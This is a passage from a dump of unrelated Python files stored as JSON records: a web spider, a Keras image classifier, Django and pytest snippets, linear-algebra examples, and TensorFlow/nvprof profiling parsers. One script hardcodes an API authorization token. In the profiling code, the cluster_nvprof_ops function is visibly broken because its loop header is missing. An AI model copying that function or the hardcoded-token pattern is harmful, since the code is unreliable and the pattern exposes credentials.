\n\n\t\t\n ","repo_name":"yananfei-Bette/Leetcode","sub_path":"interview/EA/word_Break_2.py","file_name":"word_Break_2.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"31967391625","text":"# !/usr/python/bin\n# -*- coding: UTF-8 -*-\nimport scrapy\n\nclass HeartsongSpider(scrapy.spiders.Spider):\n    name = \"heartsong\"  # name of the spider, used when running it\n    allowed_domains = [\"heartsong.top\"]  # domains allowed to be crawled; pages outside them are not fetched\n    start_urls = [\n        \"http://www.heartsong.top\"  # start url; this example only crawls this one page\n    ]\n\n    def parse(self, response):  # the actual crawling method\n        html = response.body  # response is the reply returned by the site\n        # the following four lines save the html to a file\n        filename = \"index.html\"\n        file = open(filename, \"w\")\n        file.write(html)\n        file.close()","repo_name":"yucongshen/spiderProject","sub_path":"tutorial/tutorial/spiders/heartsong_spider.py","file_name":"heartsong_spider.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"43664305088","text":"# Import libraries\r\nfrom keras.layers import Dense, MaxPooling2D, Conv2D, Dropout, LeakyReLU, MaxPool2D\r\nfrom keras.layers import Flatten, InputLayer\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.models import Sequential\r\nfrom keras.utils import np_utils\r\nfrom keras.initializers import Constant\r\nfrom keras.datasets import fashion_mnist\r\nimport numpy as np\r\nfrom glob import glob\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.misc import imresize,imread,imsave\r\nfrom sklearn.cross_validation import train_test_split\r\nimport os\r\nfrom keras.models import Model,load_model\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nimport argparse\r\n\r\nparser = argparse.ArgumentParser(description=\"task1\")\r\nparser.add_argument(\"-tr\",\"--train_folder\",type = str, default = 'data/train/')\r\nparser.add_argument(\"-te\",\"--test_folder\",type = str, default = 'data/test/')\r\nparser.add_argument(\"-to\",\"--save_path\",type = str, default = './')\r\nargs = parser.parse_args()\r\n\r\n\r\n# Hyper Parameters\r\ntrain_folder = args.train_folder\r\ntest_folder = args.test_folder\r\nsave_path = args.save_path\r\n\r\n# Load data\r\nfile_name = train_folder\r\nimage_file = np.array(glob(os.path.join(file_name,'*')))\r\nprint(image_file.shape)\r\nlabels = []\r\n#label_file = np.array(glob('../HW5_data/FullLengthVideos/labels/train/*.txt'))\r\nfor i,file in enumerate(image_file):\r\n    img_name = np.array(glob(os.path.join(file,'*.png')))\r\n    img = np.array([imread(name) for name in img_name])\r\n    if i == 0:\r\n        imgs = img\r\n    else:\r\n        imgs = np.append(imgs,img,0)\r\n    label = np.zeros(img.shape[0])+i\r\n    labels = np.append(labels,label)\r\nprint(imgs.shape,labels.shape)\r\n\r\nx_train, x_valid, y_train, y_valid = train_test_split( imgs, labels, test_size=0.1, random_state=1 )\r\nprint(x_train.shape,x_valid.shape)\r\nprint(y_train.shape,y_valid.shape)\r\n# Function load_minst is available in git.\r\n#(x_semi_train, y_semi_train), (x_test, y_test) = fashion_mnist.load_data()\r\n#x_semi_train = x_semi_train.astype('float32') / 255\r\n#x_semi_train = x_semi_train.reshape(x_semi_train.shape[0], 28, 28, 1)\r\n# Prepare datasets\r\n# This step contains normalization and reshaping of input.\r\n# For output, it is important to change the number to a one-hot vector.
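\r\n# (editor-added illustration) np_utils.to_categorical([2, 0], 10) returns two rows of length 10\r\n# with a single 1 at indices 2 and 0 respectively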
\r\n#idx = np.random.randint(low = 0,high = 60000,size = 2000)\r\nx_train = x_train.astype('float32') / 255\r\nx_train = x_train.reshape(x_train.shape[0], 28, 28, 1)\r\n#x_train = np.repeat(x_train.astype('float32'), 3, 3)\r\nx_valid = x_valid.astype('float32') / 255\r\nx_valid = x_valid.reshape(x_valid.shape[0], 28, 28, 1)\r\n#x_valid = np.repeat(x_valid.astype('float32'), 3, 3)\r\n#x_test = x_test.astype('float32') / 255\r\n#x_test = x_test.reshape(x_test.shape[0], 28, 28, 1)\r\n#x_test = np.repeat(x_test.astype('float32'), 3, 3)\r\n\r\ny_train = np_utils.to_categorical(y_train, 10)\r\ny_valid = np_utils.to_categorical(y_valid, 10)\r\n#y_test = np_utils.to_categorical(y_test, 10)\r\n# Create model in Keras\r\nnum_classes = 10\r\n\r\nmodel = Sequential()\r\nmodel.add(InputLayer(input_shape=(28, 28, 1)))\r\nmodel.add(Conv2D(filters=32, kernel_size=(3, 3), padding=\"same\", input_shape=x_train.shape[1:], activation='relu'))\r\nmodel.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation='relu'))\r\n#model.add(Conv2D(filters=128, kernel_size=(3, 3), padding=\"same\", activation='relu'))\r\nmodel.add(MaxPool2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Conv2D(filters=128, kernel_size=(3, 3), padding=\"same\", activation='relu'))\r\nmodel.add(Conv2D(filters=256, kernel_size=(3, 3), padding=\"valid\", activation='relu'))\r\n#model.add(Conv2D(filters=512, kernel_size=(3, 3), padding=\"valid\", activation='relu'))\r\nmodel.add(MaxPool2D(pool_size=(3, 3)))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(256,activation='relu'))\r\n#model.add(ReLU())\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(256,activation='relu'))\r\n#model.add(ReLU())\r\n#model2.add(Dropout(0.5))\r\nmodel.add(Dense(num_classes, activation='softmax'))\r\n\r\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n#model = load_model('task1.h5')\r\ncallbacks = [ ModelCheckpoint('checkpoint/task_my_vgg.h5', monitor='val_loss', save_best_only=True, verbose=0) ]\r\nhistory = model.fit(x_train, y_train, epochs=100, batch_size=64, validation_data=(x_valid, y_valid),callbacks=callbacks)\r\nloss = history.history['loss']\r\nval_loss = history.history['val_loss']\r\nnp.save('./task_my_vgg.npy',np.array([loss,val_loss]))\r\n\r\n#score = model.evaluate(x_test, y_test, verbose=1)\r\n#print(score)","repo_name":"Gary830317/DLCV2018","sub_path":"final/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72277119272","text":"import numpy as np\nfrom scipy.interpolate import griddata\n\n\ndef img_inter_func(valid_index, values, method='nearest'):\n out_img = np.empty(values.shape, np.float32)\n X, Y = np.meshgrid(np.arange(0, values.shape[0]), np.arange(0, values.shape[1]))\n if len(values.shape) == 3:\n for i in range(values.shape[2]):\n chn = values[:, :, i]\n Ti = griddata(valid_index, chn[valid_index], (X, Y), method=method)\n out_img[:, :, i] = Ti.transpose()\n else:\n Ti = griddata(valid_index, values[valid_index], (X, Y), method=method)\n out_img = Ti.transpose()\n return out_img\n","repo_name":"junxuan-li/LRG_360Panoramic","sub_path":"Lighting_Estimation/img_interpolation.py","file_name":"img_interpolation.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"74234368234","text":"\nfrom rest_framework.serializers import 
ModelSerializer\nfrom rest_framework import exceptions\nfrom Books.models import Book\n\nclass BookSerializer(ModelSerializer):\n    class Meta:\n        model=Book\n        fields = ['book_name', 'pages', 'price','author']\n\n    def validate(self,data):\n        print(data)\n        price = data.get('price')\n        if price<50:\n            msg = \"price must be at least 50\"\n            raise exceptions.ValidationError(msg)\n        return data\n\n\n","repo_name":"Minu94/PythonWorkBook1","sub_path":"book/BookPro/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"23642777752","text":"import os\nfrom canvas import irio\nfrom canvas import Canvas\n\ncanvas_output = 'output/sample05/canvas_output.bdx'\nos.makedirs('output/sample05', exist_ok=True)\n\ncanvas = Canvas()\np = canvas\ncbs_array = [\n    {'cb_mode': p.MODE_REPEAT_CB, 'command': 'cmd',\n     'cb_name': f'cb{0}', 'conditional': False}\n]\ncb_i = 1\nfor _ in range(10):\n    for i in range(2):\n        cbs_array.append(\n            {'command': 'cmd', 'cb_name': f'cb{cb_i}', 'conditional': True, 'tick_delay': 10})\n        cb_i += 1\n    for i in range(3):\n        cbs_array.append(\n            {'command': 'cmd', 'cb_name': f'cb{cb_i}', 'conditional': False, 'tick_delay': 20})\n        cb_i += 1\n\n\n# The problem: arranging the command blocks in one straight line is clearly unsuitable;\n# the blocks should first be stacked within a single layer (dir1, dir2)\n# and move on to the next layer (dir3) only once that layer is full.\n# The second problem: conditional command blocks fail at the corners, so a re-layout is needed,\n# i.e. empty chain command blocks are inserted where necessary until a valid position can be assigned.\n# x, y, z give the starting position of the stack\ncanvas.snake_folding_cmds(\n    x=0, y=20, z=0,\n    dir1=(1, 0, 0), dir1_lim=4,\n    dir2=(0, 0, 1), dir2_lim=4,\n    dir3=(0, 1, 0),\n    cbs_array=cbs_array\n)\n\n# The directions can also be specified like this\ncanvas.snake_folding_cmds(\n    x=10, y=20, z=0,\n    dir1=(1, 0, 0), dir1_lim=4,\n    dir2=(0, 0, -1), dir2_lim=4,\n    dir3=(0, -1, 0),\n    cbs_array=cbs_array\n)\n\nfinal_ir = canvas.done()\nirio.dump_ir_to_bdx(final_ir, canvas_output, need_sign=True, author='2401PT')\n","repo_name":"CMA2401PT/BDXWorkShop","sub_path":"Sample05_snake_folding.py","file_name":"Sample05_snake_folding.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"zh","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"}
{"seq_id":"71682252713","text":"\nclass TradedPicks:\n    @staticmethod\n    def update_worksheet_with_traded_picks(roster_to_users_dict, league, worksheet):\n        COLUMN_MAPPING = {\n            'previous_owner_id': lambda x: roster_to_users_dict[x],\n            'owner_id': lambda x: roster_to_users_dict[x],\n            'round': lambda x: x,\n            'season': lambda x: x\n        }\n\n        GSHEET_COLUMNS = ['traded_from', 'traded_to', 'round', 'season']\n\n        traded_picks = league.get_traded_picks()\n\n\n        traded_picks_to_upload = []\n\n        for traded_pick in traded_picks:\n            traded_pick_arr = []\n            for api_mapping, func in COLUMN_MAPPING.items():\n                traded_pick_arr.append(func(traded_pick[api_mapping]))\n            traded_picks_to_upload.append(traded_pick_arr)\n\n        traded_picks_to_upload.sort(key=lambda x: (x[3], x[2], x[1]), reverse=False)\n\n        worksheet.batch_update([{\n            'range': 'A1:D1',\n            'values': [GSHEET_COLUMNS]},\n            {'range': f\"A2:D{len(traded_picks_to_upload)+2}\",\n            'values': traded_picks_to_upload}\n        ])","repo_name":"jpatdalton/sleeper_analytics","sub_path":"models/traded_picks.py","file_name":"traded_picks.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"70392852073","text":"import pytest\nfrom pytest_devlife import util\ntry:\n    import solution\nexcept:\n    solution = None\ntry:\n    if solution:\n        from solution import esconde_senha\nexcept:\n    pass\n\n\ndef setup():\n    util.function_exists_in_module(solution, 'esconde_senha')\n\n\n@pytest.mark.parametrize(\n    'senha_visivel,senha_escondida',\n    [\n        pytest.param(visivel, escondida, id=visivel)\n        for visivel, escondida in [\n            ('batman', '******'),\n            ('', ''),\n            ('$&nh4!?', '*******'),\n            ('*', '*'),\n            ('charada?', '********'),\n            ('PiNGu1n\\\\/', '*********'),\n            ('*esconde*', '*********')\n        ]\n    ]\n)\n\n\ndef test_esconde_a_senha(senha_visivel, senha_escondida):\n    resultado = esconde_senha(senha_visivel)\n    assert resultado == senha_escondida, f'The number of characters in the input does not match the number in the output.\\nHINT: for an input of {len(senha_visivel)} characters, your function returns {len(resultado)} characters.'\n","repo_name":"prady001/projects","sub_path":"python/string/exercises/esconde_senha/test_solution.py","file_name":"test_solution.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"25958593456","text":"import sympy\r\nimport numpy as np\r\n\r\nmatrix_one = np.asarray([\r\n[2, -2, 4,-2],\r\n[2, 1, 10,7],[-4,4,-8,4],[4,-1,14,6] \r\n], dtype=np.float32)\r\n\r\nreduced_echelon_form=sympy.Matrix(matrix_one).rref()\r\n#print(reduced_echelon_form)\r\n\r\n# Note that accuracy might not be perfect, so double-check with an online row echelon calculator\r\n\r\nmatrix_two = np.asarray([\r\n[1,1, -1,7],\r\n[1, -1, 2,3],[2,1,1,9] \r\n], dtype=np.float32)\r\n\r\nreduced_echelon_form2=sympy.Matrix(matrix_two).rref()\r\n#print(reduced_echelon_form2)\r\n\r\n# rref() returns a pair. The first element is the reduced row echelon form.\r\n# Note column 1=x, column 2=y, column 3=z, column 4=result.\r\n# We can see that z=-2, y=-1, x=6.\r\n# The second element just shows which column holds the leading 1 of each row\r\n# (see the short unpacking sketch at the end of this script).\r\nmatrix_three = np.asarray([\r\n[30,-1,-1000],\r\n[50,-1,-100] \r\n], dtype=np.float32)\r\n\r\nreduced_echelon_form3=sympy.Matrix(matrix_three).rref()\r\nprint(reduced_echelon_form3)
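\r\n\r\n# --- Editor's sketch, not part of the original script: rref() returns a\r\n# (matrix, pivot_columns) pair, so the two parts described in the comments above\r\n# can be unpacked directly instead of printing the raw tuple. The variable names\r\n# below are illustrative only.\r\nrref_matrix, pivot_cols = sympy.Matrix(matrix_three).rref()\r\nprint(rref_matrix)  # the reduced row echelon form itself\r\nprint(pivot_cols)   # e.g. (0, 1): the columns containing each row's leading 1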
","repo_name":"axaa42/Linear_algebra-","sub_path":"row_echolon_form_functon.py","file_name":"row_echolon_form_functon.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"39401626173","text":"import requests\nimport jsonpath\n\nfrom pprint import pprint\n\nheaders = {\n    'Authorization': 'Token bf654bd324541d783c7c4a78cf97174e47ef64d1'\n}\n\nurl_base_cursos = 'http://localhost:8000/api/v2/cursos/'\nurl_base_avaliacoes = 'http://localhost:8000/api/v2/avaliacoes/'\n\nresultado = requests.get(url=url_base_cursos, headers=headers)\npprint(resultado.json())\n","repo_name":"Erkmann/Curso-Django-Rest","sub_path":"teste_get.py","file_name":"teste_get.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"24622201458","text":"\"\"\"\nCreated on 03/27/18.\n@author: Numan Laanait, Suhas Somnath\n\"\"\"\nimport json\nimport numpy as np\nfrom collections import OrderedDict\nimport multiprocessing as mp\nimport sys\nfrom os import listdir, path\nimport re\nimport os\n\n\ndef json_to_ordered_dict(file):\n    \"\"\"\n    Reads a timeline.json file output by Tensorflow/libcupti and returns an OrderedDict object\n    :param file: .json file.\n    :return: OrderedDict\n    \"\"\"\n    with open(file, mode='r') as f:\n        def _as_ordered_dict(val):\n            return OrderedDict(val)\n\n        output = json.load(f, object_hook=_as_ordered_dict, object_pairs_hook=_as_ordered_dict)\n    dic = 
OrderedDict(output)\n\n return dic\n\n\ndef get_all_ops(trace_dic):\n \"\"\"\n Params:\n trace_dic: collections.OrderedDict of traceEvent\n Return: list of dictionaries of all ops.\n \"\"\"\n try:\n trace_events = trace_dic['traceEvents']\n except KeyError:\n print('Not valid GPU trace dict object.')\n sys.exit()\n all_ops = []\n for trace in trace_events:\n try:\n if trace['cat'] == 'Op':\n all_ops.append(trace)\n except KeyError:\n pass\n return all_ops\n\n\ndef get_stream_all(trace_dic):\n \"\"\"\n Params:\n trace_dic: collections.OrderedDict of traceEvent\n Return: pid of GPU/stream:all, (stream, pid) dictionary\n \"\"\"\n try:\n trace_events = trace_dic['traceEvents']\n except KeyError:\n print('Not valid GPU trace dict object.')\n sys.exit()\n all_procs = []\n for trace in trace_events:\n try:\n if trace['name'] == 'process_name':\n all_procs.append((trace['args']['name'], trace['pid']))\n except KeyError:\n pass\n dic_procs = dict(all_procs)\n pid = dic_procs['/device:GPU:0/stream:all Compute']\n return dic_procs, pid\n\n\ndef get_unique_ops_names(all_ops):\n \"\"\"\n Find unique op names.\n Params:\n all_ops: list, of dictionary of all operations.\n Return: list of unique op names.\n \"\"\"\n return set(op['name'] for op in all_ops)\n\n\ndef get_wall_duration(op_names, all_ops, pid_list=(11, 7, 13, 15, 9)):\n \"\"\"\n Calculates wall duration for each op in op_names.\n Params:\n op_names: list (str), names of ops of interest.\n pid_list: list (str), names of pid to include.\n all_ops: output of get_all_ops().\n Return:\n total wall duration, dict['op'] = wall duration.\n \"\"\"\n # 1. Construct dictionary of op with name matching op_names\n ops_dic = OrderedDict()\n for name in op_names:\n ops = []\n for op in all_ops:\n if op['name'] == name:\n ops.append(op)\n ops_dic[name] = ops\n\n # 2. get duration for each op\n op_dict = OrderedDict()\n total_dur = 0\n for op_name in op_names:\n op_dur = 0\n for itm in ops_dic[op_name]:\n if itm['pid'] in pid_list:\n op_dur += itm['dur']\n op_dict[op_name] = op_dur * 1e-3 # convert from us to ms\n total_dur += op_dur * 1e-3\n\n # fixing the NCCL key:\n op_dict['unknown (nccl AllReduceKernel_sum_)'] = op_dict.pop('unknown')\n\n # Sorting durations:\n sorted_dur = sorted(op_dict.items(), key=lambda x: x[1])[::-1]\n # sorted_dur = sorted(op_dict.items(), key=operator.itemgetter(1))\n\n return OrderedDict(sorted_dur), total_dur\n\n\ndef print_timeline_stats(sorted_dur, total_dur, min_msec=5):\n \"\"\"\n Prints the total time and times per op so long as the time was > min_msec\n :param sorted_dur: OrderedDict object with time per op. Times in msec\n :param total_dur: Number - total wall time per step. Time in msec\n :param min_msec: Number, optional - minimum wall time for op\n \"\"\"\n print('Total Wall Duration (ms): %4.3f\\n' % total_dur)\n print('OPS with wall duration > 5 ms:')\n for key, val in sorted_dur.items():\n if val > min_msec:\n print('%s : %3.3f ms' % (key, val))\n\n\ndef parse_single_timeline(curr_file):\n \"\"\"\n Parses a single timeline file and extracts the time per op and total wall time\n\n :param curr_file: str / unicode - path to a single timeline .json file\n :return dicts: OrderedDict object with time per op. Times in msec\n :return tot_times: Number - total wall time per step. 
Time in msec\n    \"\"\"\n    dic = json_to_ordered_dict(curr_file)\n    all_ops = get_all_ops(dic)\n    unique_op_names = get_unique_ops_names(all_ops)\n    proc_dic, stream_all_pid = get_stream_all(dic)\n    sorted_dur_dicts, total_dur = get_wall_duration(unique_op_names, all_ops, pid_list=[stream_all_pid])\n    return sorted_dur_dicts, total_dur\n\n\ndef parse_all_timeline_files(folder, prefix='timeline', suffix='.json'):\n    \"\"\"\n    Parses all timeline files in the given directory to extract the times per op and total wall time\n\n    :param folder: str / unicode - path to directory containing all the timeline json files\n    :param prefix: str / unicode (optional) - Prefix for the file names. Default = 'timeline'\n    :param suffix: str / unicode (optional) - suffix for the file names. Default = '.json'\n    :return dicts: list of OrderedDict objects per timeline file. Times in msec\n    :return tot_times: list of Numbers with the total wall time per step. Times in msec\n    \"\"\"\n\n    files = []\n    for name in listdir(folder):\n        if name.startswith(prefix) and name.endswith(suffix):\n            files.append(path.join(path.abspath(folder), name))\n\n    dicts = []\n    tot_times = []\n    if len(files) > 16:\n        cores = 4\n        pool = mp.Pool(cores)\n        jobs = pool.imap(parse_single_timeline, files)\n        results = [j for j in jobs]\n        pool.close()\n        for item in results:\n            dicts.append(item[0])\n            tot_times.append(item[1])\n    else:\n        for curr_file in files:\n            sorted_dur_dicts, total_dur = parse_single_timeline(curr_file)\n            dicts.append(sorted_dur_dicts)\n            tot_times.append(total_dur)\n\n    return dicts, tot_times\n\n\ndef parse_nvprof_csv(nvprof_csv):\n    \"\"\"\n    Extract data from nvprof and calculate/return OPS, FLOPS.\n    \"\"\"\n    p = re.compile(r'Device')\n    with open(nvprof_csv) as f:\n        skip_ln = 0\n        while (True):\n            line = f.readline()\n            match = p.search(line)\n            if match:\n                fields = line\n                skip_ln += 1\n                break\n            if skip_ln > 20:\n                print('The provided file is missing nvprof headers!')\n                break\n            skip_ln += 1\n    fields = fields.split(',')\n    # Now that the number of header rows are known, the rest can be extracted easily\n    arr = np.genfromtxt(nvprof_csv, skip_header=skip_ln, delimiter='Floating Point Operations(Single Precision)',\n                        comments='==', dtype=None, encoding=None)\n\n    logs = dict()\n    # it would have been easier if we could use pandas dataframes but that's not available\n    for lhs, rhs in arr:\n        lhs_splits = lhs.split(',')\n        rhs_splits = rhs.split(',')\n        logs[','.join(lhs_splits[1:-3])] = {'invocations': int(lhs_splits[-3]),\n                                            'min_ops': int(float(rhs_splits[1])),\n                                            'max_ops': int(float(rhs_splits[2])),\n                                            'avg_ops': int(float(rhs_splits[3]))}\n    return logs\n\n\ndef sum_nvprof_ops(nvprof_dict):\n    sum_min = 0\n    sum_max = 0\n    sum_avg = 0\n    for key, val in nvprof_dict.items():\n        sum_min += val['min_ops']\n        sum_max += val['max_ops']\n        sum_avg += val['avg_ops']\n    return sum_min, sum_max, sum_avg\n\n\ndef cluster_nvprof_ops(nvprof_dict, verbose=False):\n    translation = {'convolve_sgemm': 'conv', 'volta_gcgemm': 'volta_gcgemm', 'relu': 'relu',\n                   'fft2d_r2c': 'fft2d_r2c', 'fft2d_c2r': 'fft2d_c2r',\n                   'EigenMetaKernel': 'eigen'}  # NOTE: this value and the loop header below were\n    # garbled in the source text; they are reconstructed from the variables referenced further down\n    # (new_dict, count, grouped, new_val, key, gen_name, spec_name).\n    new_dict = dict()\n    count = 0\n    for key, new_val in nvprof_dict.items():\n        grouped = False\n        for spec_name, gen_name in translation.items():\n            if spec_name in key:\n                if verbose:\n                    print(gen_name + ' >> contains >> ' + spec_name)\n                old_val = new_dict.get(gen_name, None)\n                if old_val is not None:\n                    if verbose:\n                        print('existing entry:', old_val)\n                        print('current entry:', new_val)\n                    for prop_name in ['min_ops', 'max_ops', 'avg_ops', 'invocations']:\n                        new_val[prop_name] += old_val[prop_name]\n                else:\n                    if verbose:\n                        print('no prior entry found. 
Using current entry:', new_val)\n new_dict[gen_name] = new_val\n grouped = True\n count += 1\n if not grouped:\n if verbose:\n print('Could not group key:', key)\n new_dict[key] = new_val\n if verbose:\n print('')\n print('Collapsed {} of {} entries'.format(count, len(nvprof_dict)))\n return new_dict\n\n\ndef sort_nvprof_dict(nvprof_dict, sort_key='avg_ops'):\n new_dict = dict()\n for key, val_dict in nvprof_dict.items():\n new_dict[key] = val_dict[sort_key]\n sorted_dict = sorted(new_dict.items(), key=lambda x: x[1])[::-1]\n return OrderedDict(sorted_dict)\n\n\n# http://imatge-upc.github.io/telecombcn-2016-dlcv/slides/D2L1-memory.pdf\n\ndef conv(inputs, params, bytesize):\n # NCHW not NHWC\n num_weights = np.prod(params['kernel'] + [params['features'], inputs[1]])\n outputs = tuple([inputs[0], params['features'], inputs[2] // params['stride'][0], inputs[3] // params['stride'][1]])\n mem = np.prod(outputs) * bytesize\n # account for the stride as well!\n this_ops = np.prod(list(params['kernel']) + [inputs[1]] + list(outputs[2:]) + [params['features']])\n return outputs, num_weights, mem, this_ops\n\n\ndef linear(inputs, params, bytesize):\n if len(inputs) == 4:\n inputs = (inputs[0], np.prod(inputs[1:]))\n outputs = (inputs[0], params['bias'])\n num_weights = params['bias'] + np.prod([params['bias'], inputs[1]]) + batch_norm(inputs)\n mem = np.prod(outputs) * bytesize\n this_ops = inputs[1] * params['weights']\n return outputs, num_weights, mem, this_ops\n\n\ndef pool(inputs, params, bytesize):\n outputs = (inputs[0], inputs[1], inputs[2] // params['stride'][0], inputs[3] // params['stride'][1])\n mem = np.prod(outputs) * bytesize\n return outputs, 0, mem, 0\n\n\ndef residual(orig_inputs, params, bytesize):\n weights = 0\n mem = 0\n ops = 0\n inputs = orig_inputs\n for layer_name, layer_params in list(params.items()):\n if not layer_name.startswith('conv'):\n continue\n outputs, curr_weights, curr_mem, curr_ops = conv(inputs, layer_params, bytesize)\n weights += curr_weights + batch_norm(outputs)\n mem += curr_mem\n ops += curr_ops\n # print('\\t%s - %s, weights: %3.1e, memory: %3.1f MB, ops: %3.1e' % \\\n # (layer_name, outputs, curr_weights, curr_mem / 1024**2, curr_ops))\n inputs = outputs\n # last conv for\n if outputs != orig_inputs:\n shortcut_parms = {\"kernel\": [1, 1], \"features\": outputs[1], \"batch_norm\": True, \"stride\": [1, 1]}\n orig_inputs, curr_weights, curr_mem, curr_ops = conv(orig_inputs, shortcut_parms, bytesize)\n weights += curr_weights\n mem += curr_mem\n ops += curr_ops\n return outputs, weights, mem, ops\n\n\ndef batch_norm(inputs):\n return 2 * inputs[1]\n\n\ndef calculate_network_complexity(inputs, network, is_fp16=False, verbose=False):\n bytesize = 4\n if is_fp16:\n bytesize = 2\n\n layer_stats = []\n tot_weights = 0\n tot_mem = np.prod(inputs) * bytesize\n tot_ops = 0\n\n if verbose:\n print('Inputs: %s, memory: %3.1f MB' % (inputs, tot_mem / 1024 ** 2))\n for layer_name, layer_params in list(network.items()):\n # print('-------------------------')\n # print(layer_name, layer_params)\n if layer_params['type'] == 'convolutional':\n func = conv\n elif layer_params['type'] == 'pooling':\n func = pool\n elif layer_params['type'] in ['fully_connected', 'linear_output']:\n func = linear\n elif layer_params['type'] == 'residual':\n func = residual\n else:\n print('Unrecognized layer type ' + layer_params['type'])\n break\n outputs, weights, mem, this_ops = func(inputs, layer_params, bytesize)\n if verbose:\n print('%s - %s, weights: %d, memory: %3.1f MB, ops: 
%3.1e' % (\n layer_name, outputs, weights, mem / 1024 ** 2, this_ops))\n inputs = outputs\n tot_ops += this_ops\n tot_mem += mem\n tot_weights += weights\n layer_stats.append({'name': layer_name, 'shape': outputs, 'weights': weights, 'memory': mem, 'ops': this_ops,\n 'type': layer_params['type']})\n if verbose:\n print('Total # of layers: %d, weights: %3.1e, memory: %s MB, ops: %3.2e \\n' % (len(network), tot_weights,\n tot_mem / 1024 ** 2, tot_ops))\n return layer_stats, tot_weights, tot_mem, tot_ops\n\n\nimport os\nimport re\nfrom collections import OrderedDict\nimport numpy as np\nimport sys\n\nFWD_ALGO_list=[\n\"CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_GEMM\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_PRECOMP_GEMM\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_GEMM\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_DIRECT\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_FFT\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_FFT_TILING\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_WINOGRAD\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_WINOGRAD_NONFUSED\"]\n\nBWD_ALGO_DATA_list= [\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_0\",\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_1\",\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT\",\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING\",\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_WINOGRAD\",\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_WINOGRAD_NONFUSED\"]\n\n\nBWD_ALGO_FILTER_list=[\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_0\",\n\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_1\",\n\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_FFT\",\n\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_3\",\n\"CUDNN_CONVOLUTION_BWD_FILTER_WINOGRAD_NONFUSED\",\n\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_FFT_TILING\"]\n\nFWD_ALGO_TENSORCORE=[\"CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_PRECOMP_GEMM\",\n\"CUDNN_CONVOLUTION_FWD_ALGO_WINOGRAD_NONFUSED\"\n]\n\nBWD_ALGO_DATA_TENSORCORE=[\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_1\",\n\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_WINOGRAD_NONFUSED\"]\n\nBWD_ALGO_FILTER_TENSORCORE=[\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_1\",\n\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_WINOGRAD_NONFUSED\"]\n\nMATH_OPS_list= ['CUDNN_TENSOR_OP_MATH', 'CUDNN_DEFAULT_MATH']\n\ndef todict(LIST):\n return OrderedDict([(itm, [re.compile(itm), 0]) for itm in LIST])\n\n\ndef count_occurences(filepath, line_bounds, ord_dict_list, portion=0.5):\n line_lb, line_ub = line_bounds\n with open(filepath,'r') as f:\n for (num_line,line) in enumerate(f):\n if num_line > line_lb and num_line < line_ub:\n for ord_dict in ord_dict_list:\n for key, itm in ord_dict.items():\n if itm[0].search(line):\n ord_dict[key][1] += 1\n\n\ndef rank_entries(ord_dict_list, steps):\n FWD_ALGO_TENSORCORE=[\"CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_PRECOMP_GEMM\",\n \"CUDNN_CONVOLUTION_FWD_ALGO_WINOGRAD_NONFUSED\"\n ]\n\n BWD_ALGO_DATA_TENSORCORE=[\"CUDNN_CONVOLUTION_BWD_DATA_ALGO_1\",\n \"CUDNN_CONVOLUTION_BWD_DATA_ALGO_WINOGRAD_NONFUSED\"]\n\n BWD_ALGO_FILTER_TENSORCORE=[\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_1\",\n 